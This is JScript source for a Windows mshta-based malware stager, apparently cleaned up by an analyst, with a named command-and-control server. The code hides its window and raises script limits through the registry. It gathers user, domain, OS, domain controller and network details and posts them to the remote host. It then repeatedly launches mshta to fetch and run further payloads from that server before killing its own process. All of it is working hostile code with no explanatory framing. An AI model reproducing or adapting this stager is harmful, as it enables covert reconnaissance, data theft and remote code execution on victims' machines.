|
window.moveTo(-105, 300); |
|
window.blur(); |
|
window.resizeTo(10, 15); |
|
try { |
|
window.onerror = function(sMsg, sUrl, sLine) { |
|
return false; |
|
} |
|
window.onfocus = function() { |
|
window.blur(); |
|
} |
|
} catch (e) {} |
|
var mainFuncStruct = {}; |
|
|
|
function reverseString(s) { |
|
return s.split("").reverse().join(""); |
|
} |
|
mainFuncStruct.fileObj = new ActiveXObject("Scrip" + "ting.FileSystemOb" + "ject"); |
|
mainFuncStruct.shellObj = new ActiveXObject("WScrip" + "t.S" + "hell"); |
|
mainFuncStruct.cncDomain = "http://crt.officecloud.top/st"; |
|
mainFuncStruct.maybeToken = "REDACTED"; |
|
mainFuncStruct.emptyIfFirstRun = ""; |
|
mainFuncStruct.someCNCUrl = "http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED"; |
|
mainFuncStruct.highNumber = "999999999999999"; |
|
mainFuncStruct.callbackAfterTimeout = function(ms, callback) { |
|
if (mainFuncStruct.isRunningInMshta()) { |
|
window.setTimeout(callback, ms); |
|
} else { |
|
var now = new Date().getTime(); |
|
while (new Date().getTime() < now + ms); |
|
callback(); |
|
} |
|
} |
|
mainFuncStruct.killSelf = function() { |
|
if (mainFuncStruct.isRunningInMshta()) { |
|
try { |
|
window["close"](); |
|
} catch (e) {} |
|
try { |
|
window.self["close"](); |
|
} catch (e) {} |
|
try { |
|
window.top["close"](); |
|
} catch (e) {} |
|
try { |
|
self["close"](); |
|
} catch (e) {} |
|
try { |
|
window.open('', '_self', ''); |
|
window["close"](); |
|
} catch (e) {} |
|
} |
|
try { |
|
WScript.quit(); |
|
} catch (e) {} |
|
try { |
|
var pid = mainFuncStruct.funcStruct1.getOwnPID(); |
|
mainFuncStruct.funcStruct1.terminateProcessByPID(pid); |
|
} catch (e) {} |
|
} |
|
mainFuncStruct.isRunningInMshta = function() { |
|
return typeof(window) !== "undefined"; |
|
} |
|
mainFuncStruct.checkIfWscriptDefined = function() { |
|
return typeof(WScript) !== "undefined"; |
|
} |
|
mainFuncStruct.maybeGenGUID = function() { |
|
try { |
|
function s4() { |
|
return Math.floor((1 + Math.random()) * 0x1235612).toString(16).substring(1); |
|
} |
|
return s4() + s4() + '-' + s4() + s4() + '-' + s4() + '-' + |
|
s4() + '-' + s4() + s4() + s4(); |
|
} catch (e) {} |
|
} |
|
mainFuncStruct.funcStruct4 = {}; |
|
mainFuncStruct.funcStruct4.getSessions = function() { |
|
try { |
|
var res = mainFuncStruct.funcStruct3.runCmdToFile("(net1 session || echo ofailur)", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); |
|
if (res.indexOf("ofailur") == -1) { |
|
return true; |
|
} |
|
return false; |
|
} catch (e) { |
|
return false; |
|
} |
|
} |
|
mainFuncStruct.funcStruct4.readOsVersion = function() { |
|
try { |
|
var osver = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName"); |
|
var osbuild = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber"); |
|
return osver + "triplestar" + osbuild; |
|
} catch (e) {} |
|
return "Unknown"; |
|
} |
|
mainFuncStruct.funcStruct4.getDCName = function() { |
|
try { |
|
var DC = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName"); |
|
if (DC.length > 0) { |
|
return DC; |
|
} |
|
} catch (e) {} |
|
return "Unknown"; |
|
} |
|
mainFuncStruct.funcStruct4.getArch = function() { |
|
try { |
|
var arch = mainFuncStruct.shellObj.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE"); |
|
return arch; |
|
} catch (e) {} |
|
return "Unknown"; |
|
} |
|
mainFuncStruct.funcStruct4.cdToTempFolder = function() { |
|
try { |
|
var truew = mainFuncStruct.funcStruct3.runCmdToFile("cd", "%TEMP%\\truew.tmp"); |
|
return truew; |
|
} catch (e) {} |
|
return ""; |
|
} |
|
mainFuncStruct.funcStruct4.getRoutingInfo = function() { |
|
try { |
|
var routeprint4 = mainFuncStruct.funcStruct3.runCmdToFile("route PRINT -4", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); |
|
var res = routeprint4.split("\r\n"); |
|
for (var i = 0; i < res.length; i++) { |
|
line = res[i].split(" "); |
|
zerocount = 0; |
|
itemcount = 0; |
|
correctflag = false; |
|
for (var j = 0; j < line.length; j++) { |
|
if (line[j]) { |
|
itemcount += 1; |
|
if (itemcount == 4 && correctflag) { |
|
return line[j]; |
|
} |
|
} |
|
if (line[j] == "0.0.0.0") { |
|
zerocount += 1; |
|
if (zerocount == 2) { |
|
correctflag = true; |
|
} |
|
} |
|
} |
|
} |
|
} catch (e) {} |
|
return ""; |
|
} |
|
mainFuncStruct.funcStruct4.getComputerInfo = function() { |
|
var net = new ActiveXObject("WScript.Network"); |
|
var domain = ""; |
|
if (net.UserDomain.length != 0) { |
|
domain = net.UserDomain; |
|
} else { |
|
try { |
|
domain = mainFuncStruct.funcStruct3.runCmdToFile("echo %userdomain%", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); |
|
} catch (h) {} finally { |
|
domain = domain.split(" \r\n")[0]; |
|
} |
|
} |
|
var info = domain + "\\" + net.Username; |
|
if (mainFuncStruct.funcStruct4.getSessions()) |
|
info += "*"; |
|
info += " n0body i know " + net.ComputerName; |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.readOsVersion(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.getDCName(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.getArch(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.cdToTempFolder(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.getRoutingInfo(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.chcp(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.getSomeCodePageNum(); |
|
return info; |
|
} |
|
mainFuncStruct.funcStruct4.chcp = function() { |
|
try { |
|
return "1252" |
|
} catch (e) { |
|
return "1252"; |
|
} |
|
} |
|
mainFuncStruct.funcStruct4.getSomeCodePageNum = function() { |
|
try { |
|
return "1252" |
|
} catch (e) { |
|
return "437"; |
|
} |
|
} |
|
mainFuncStruct.funcStruct6 = {}; |
|
mainFuncStruct.funcStruct6.sendDataToCNC = function(data, headers) { |
|
return mainFuncStruct.funcStruct7.sendHTTPRequest(mainFuncStruct.funcStruct6.getCncWithJobURL(), data, headers); |
|
} |
|
mainFuncStruct.funcStruct6.sendErrorDataToCNC = function(e) { |
|
try { |
|
var headers = {}; |
|
headers["errno"] = (e.number) ? e.number : "-1"; |
|
headers["errname"] = (e.name) ? e.name : "Unknown"; |
|
headers["errdesc"] = (e.description) ? e.description : "Unknown"; |
|
return mainFuncStruct.funcStruct6.sendDataToCNC(e.message, headers); |
|
} catch (e) {} |
|
} |
|
mainFuncStruct.funcStruct6.getCncWithJobURL = function(jobkey) { |
|
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : mainFuncStruct.emptyIfFirstRun; |
|
return mainFuncStruct.someCNCUrl + jobkey + "&"; |
|
} |
|
mainFuncStruct.funcStruct6.sendHTTPRequestEmpty = function() { |
|
var url = mainFuncStruct.funcStruct6.getCncWithJobURL(); |
|
return mainFuncStruct.funcStruct7.sendHTTPRequest(url); |
|
} |
|
mainFuncStruct.funcStruct6.runMshtaFromCNC = function(jobkey, fork32Bit) { |
|
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false; |
|
var cmd = "mshta stelsy"; |
|
if (fork32Bit) |
|
cmd = mainFuncStruct.funcStruct2.getSystemFolder() + cmd; |
|
cmd = cmd.replace("stelsy", mainFuncStruct.funcStruct6.getCncWithJobURL(jobkey)); |
|
try { |
|
mainFuncStruct.funcStruct6.createProcessReturnPID(cmd); |
|
} catch (e) { |
|
mainFuncStruct.shellObj.Run(cmd, 0, false); |
|
} |
|
} |
|
mainFuncStruct.funcStruct7 = {}; |
|
mainFuncStruct.funcStruct7.getHttpRequestObj = function() { |
|
var http = null; |
|
try { |
|
http = new ActiveXObject("Msxml2.ServerXMLH" + "TTP.6.0"); |
|
http.setTimeouts(~~[], ~~[], ~~[], ~~[]); |
|
} catch (e) { |
|
http = new ActiveXObject("WinHttp.WinHttpRe" + "quest.5.1"); |
|
http.setTimeouts(0x7530, 0x7530, 0x7530, ~~[]); |
|
} |
|
return http; |
|
} |
|
mainFuncStruct.funcStruct7.setRequestHTTPHeaders = function(http, headers) { |
|
var headers = (typeof(headers) !== "undefined") ? headers : {}; |
|
var content = false; |
|
for (var key in headers) { |
|
try { |
|
var value = headers[key]; |
|
http.setRequestHeader(key, value); |
|
} catch (h) {} finally { |
|
if (key.toUpperCase() == "CONTENT-TYPE") |
|
content = true; |
|
} |
|
} |
|
if (!content) |
|
http["setR" + "eque" + "stH" + "eader"]("Content-Type", "application/json"); |
|
} |
|
mainFuncStruct.funcStruct7.sendHTTPRequest = function(url, data, headers) { |
|
var data = (typeof(data) !== "undefined") ? data : ""; |
|
var http = mainFuncStruct.funcStruct7.getHttpRequestObj(); |
|
http.open("POST", url, false); |
|
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers); |
|
http.send(data); |
|
return http; |
|
} |
|
mainFuncStruct.funcStruct7.sendHTTPRequestEmpty = function(url, headers) { |
|
var http = mainFuncStruct.funcStruct7.getHttpRequestObj(); |
|
http["op" + "en"]("GET", url, false); |
|
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers); |
|
http["se" + "nd"](); |
|
return http; |
|
} |
|
mainFuncStruct.funcStruct1 = {}; |
|
mainFuncStruct.funcStruct1.getOwnPID = function() { |
|
var cmd = mainFuncStruct.funcStruct2.expandEnvStrings("%comspec% /K hostname"); |
|
var childPid = mainFuncStruct.funcStruct6.createProcessReturnPID(cmd); |
|
var pid = -1; |
|
var latestTime = 0; |
|
var latestProc = null; |
|
var processes = mainFuncStruct.funcStruct1.getProcessList(); |
|
var items = new Enumerator(processes); |
|
while (!items.atEnd()) { |
|
var proc = items.item(); |
|
try { |
|
if (proc.ProcessId == childPid) { |
|
latestProc = proc; |
|
break; |
|
} |
|
} catch (e) {} |
|
items.moveNext(); |
|
} |
|
pid = latestProc.ParentProcessId; |
|
latestProc.Terminate(); |
|
return pid; |
|
} |
|
mainFuncStruct.funcStruct1.terminateProcessByPID = function(pid) { |
|
var processes = mainFuncStruct.funcStruct1.getProcessList(); |
|
var items = new Enumerator(processes); |
|
while (!items.atEnd()) { |
|
var proc = items.item(); |
|
try { |
|
if (proc.ProcessId == pid) { |
|
proc.Terminate(); |
|
return true; |
|
} |
|
} catch (e) {} |
|
items.moveNext(); |
|
} |
|
return false; |
|
} |
|
mainFuncStruct.funcStruct1.getProcessList = function() { |
|
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); |
|
var query = "Select * From Win32_Process"; |
|
return wmi.ExecQuery(query); |
|
} |
|
mainFuncStruct.funcStruct5 = {}; |
|
mainFuncStruct.funcStruct5.HKEY_CLASSES_ROOT = 0x80000000; |
|
mainFuncStruct.funcStruct5.HKCU = 0x80000001; |
|
mainFuncStruct.funcStruct5.HKLM = 0x80000002; |
|
mainFuncStruct.funcStruct5.REG_STRING = 0; |
|
mainFuncStruct.funcStruct5.REG_BINARY = 1; |
|
mainFuncStruct.funcStruct5.REG_DWORD = 2; |
|
mainFuncStruct.funcStruct5.REG_QWORD = 3; |
|
mainFuncStruct.funcStruct5.getWmiRegistryObject = function(computer) { |
|
var computer = (typeof(computer) !== "undefined") ? computer : "."; |
|
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv"); |
|
return reg; |
|
} |
|
mainFuncStruct.funcStruct5.setRegistryValue = function(hKey, path, key, value, valType, computer) { |
|
var reg = mainFuncStruct.funcStruct5.getWmiRegistryObject(computer); |
|
reg.CreateKey(hKey, path); |
|
if (valType == mainFuncStruct.funcStruct5.REG_STRING) |
|
reg.SetStringValue(hKey, path, key, value); |
|
else if (valType == mainFuncStruct.funcStruct5.REG_DWORD) |
|
reg.SetDWORDValue(hKey, path, key, value); |
|
else if (valType == mainFuncStruct.funcStruct5.REG_QWORD) |
|
reg.SetQWORDValue(hKey, path, key, value); |
|
else if (valType == mainFuncStruct.funcStruct5.REG_BINARY) |
|
reg.SetBinaryValue(hKey, path, key, value); |
|
} |
|
mainFuncStruct.funcStruct6 = {}; |
|
mainFuncStruct.funcStruct6.createProcessReturnPID = function(cmd) { |
|
var SW_HIDE = 0; |
|
var pid = 0; |
|
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") |
|
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_(); |
|
si.ShowWindow = SW_HIDE; |
|
si.CreateFlags = 16777216; |
|
si.X = si.Y = si.XSize = si.ySize = 1; |
|
var w32proc = wmi.Get("Win32_Process"); |
|
var method = w32proc.Methods_.Item("Create"); |
|
var inParams = method.InParameters.SpawnInstance_(); |
|
inParams.CommandLine = cmd; |
|
inParams.CurrentDirectory = null; |
|
inParams.ProcessStartupInformation = si; |
|
var outParams = w32proc.ExecMethod_("Create", inParams); |
|
return outParams.ProcessId; |
|
} |
|
mainFuncStruct.funcStruct3 = {}; |
|
mainFuncStruct.funcStruct3.runCmdToFile = function(cmd, stdOutPath) { |
|
cmd = "chcp " + mainFuncStruct.funcStruct4.getSomeCodePageNum() + " & " + cmd; |
|
var c = "cmd /c %c^oms^pec%^ /q /c " + cmd + " 1> " + mainFuncStruct.funcStruct2.expandEnvStrings(stdOutPath); |
|
c += " 2>&1"; |
|
mainFuncStruct.shellObj.Run(c, 0, true); |
|
if (mainFuncStruct.funcStruct4.chcp() == "936") { |
|
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(stdOutPath); |
|
} else { |
|
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess2(stdOutPath); |
|
} |
|
mainFuncStruct.funcStruct2.shellDeleteFile(stdOutPath); |
|
return data; |
|
} |
|
mainFuncStruct.funcStruct3.shellRunCommand = function(cmd, fork) { |
|
var fork = (typeof(fork) !== "undefined") ? fork : true; |
|
var c = "cmd /c %c^oms^pe^c% /q /c " + cmd; |
|
mainFuncStruct.shellObj.Run(cmd, 5 - 5, !fork); |
|
} |
|
mainFuncStruct.funcStruct2 = {}; |
|
mainFuncStruct.funcStruct2.expandEnvStrings = function(path) { |
|
return mainFuncStruct.shellObj.ExpandEnvironmentStrings(path); |
|
} |
|
mainFuncStruct.funcStruct2.getSystemFolder = function() { |
|
var base = mainFuncStruct.funcStruct2.expandEnvStrings("%WINDIR%"); |
|
var syswow64 = base + "\\SysWOW64\\"; |
|
if (mainFuncStruct.fileObj.FolderExists(syswow64)) |
|
return syswow64; |
|
return base + "\\System32\\"; |
|
} |
|
mainFuncStruct.funcStruct2.readFileUntilSuccess = function(path) { |
|
var loopcount = 0; |
|
while (true) { |
|
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) { |
|
try { |
|
var fd = mainFuncStruct.fileObj.OpenTextFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), 1, false, 0); |
|
var data = fd.ReadAll(); |
|
fd.Close(); |
|
return data; |
|
} catch (e) { |
|
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); |
|
continue; |
|
} |
|
} else { |
|
loopcount += 1; |
|
if (loopcount > 180) { |
|
return ""; |
|
} |
|
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); |
|
} |
|
} |
|
} |
|
mainFuncStruct.funcStruct2.readFileUntilSuccess2 = function(path, exists, certutil) { |
|
var exists = (typeof(exists) !== "undefined") ? exists : false; |
|
var certutil = (typeof(certutil) !== "undefined") ? certutil : false; |
|
if (!mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && exists) { |
|
var headers = {}; |
|
headers["Sta" + "tus"] = "Not" + "Exist"; |
|
mainFuncStruct.funcStruct6.sendDataToCNC("", headers); |
|
return ""; |
|
} |
|
var loopcount = 0; |
|
while (true) { |
|
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) { |
|
if (mainFuncStruct.funcStruct4.chcp() == "936" || certutil) { |
|
var newout = "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".l" + "og"; |
|
mainFuncStruct.funcStruct3.shellRunCommand("certut" + "il -encode " + mainFuncStruct.funcStruct2.expandEnvStrings(path) + " " + newout); |
|
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(newout); |
|
mainFuncStruct.funcStruct2.shellDeleteFile(newout); |
|
} else { |
|
var fp = mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)); |
|
var fd = fp.OpenAsTextStream(); |
|
var data = fd.read(fp.Size); |
|
fd.close(); |
|
} |
|
return data; |
|
} else { |
|
loopcount += 1; |
|
if (loopcount > 180) { |
|
return ""; |
|
} |
|
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); |
|
} |
|
} |
|
} |
|
mainFuncStruct.funcStruct2.shellDeleteFile = function(path) { |
|
mainFuncStruct.fileObj.DeleteFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), true); |
|
}; |
|
try { |
|
if (mainFuncStruct.emptyIfFirstRun != "prfx") { |
|
if (mainFuncStruct.isRunningInMshta()) { |
|
var path = "SOFT" + "WARE\\Mi" + "crosoft\\I" + "nternet Explor" + "er\\St" + "yles"; |
|
var key = "Ma" + "xScriptStat" + "ements"; |
|
mainFuncStruct.funcStruct5.setRegistryValue(mainFuncStruct.funcStruct5.HKCU, path, key, 0xFFFFFFFF, mainFuncStruct.funcStruct5.REG_DWORD); |
|
} |
|
mainFuncStruct.funcStruct6.sendDataToCNC(mainFuncStruct.funcStruct4.getComputerInfo()); |
|
try { |
|
mainFuncStruct.funcStruct6.runMshtaFromCNC(""); |
|
} catch (e) { |
|
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e) |
|
} |
|
mainFuncStruct.killSelf(); |
|
} else { |
|
if (mainFuncStruct.isRunningInMshta()) |
|
LimitedRunLoop(); |
|
else |
|
InfiniteRunLoop(); |
|
} |
|
} catch (e) { |
|
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e); |
|
} |
|
|
|
function CanHelp() { |
|
var epoch = new Date().getTime(); |
|
var expire = parseInt(mainFuncStruct.highNumber); |
|
if (epoch > expire) { |
|
return 0; |
|
} |
|
try { |
|
var work = mainFuncStruct.funcStruct6.sendHTTPRequestEmpty(); |
|
if (work.status == 201 || work.status == 202 || work.status == 200) { |
|
if (work.responseText.length > 0) { |
|
var jobkey = work.responseText; |
|
mainFuncStruct.funcStruct6.runMshtaFromCNC(jobkey, work.status == 202); |
|
} |
|
} else { |
|
return 0; |
|
} |
|
} catch (e) { |
|
return 0; |
|
} |
|
return 1; |
|
} |
|
|
|
function InfiniteRunLoop() { |
|
var an = "undefined"; |
|
while (CanHelp()); |
|
mainFuncStruct.killSelf(); |
|
} |
|
|
|
function LimitedRunLoop() { |
|
var sn = "undefined"; |
|
for (var i = (1 - 1); i < (5 * 5 - 15); ++i) { |
|
if (!CanHelp()) { |
|
mainFuncStruct.killSelf(); |
|
return; |
|
} |
|
} |
|
if (sn == "undefined") { |
|
mainFuncStruct.funcStruct6.runMshtaFromCNC(""); |
|
mainFuncStruct.killSelf(); |
|
} |
|
} |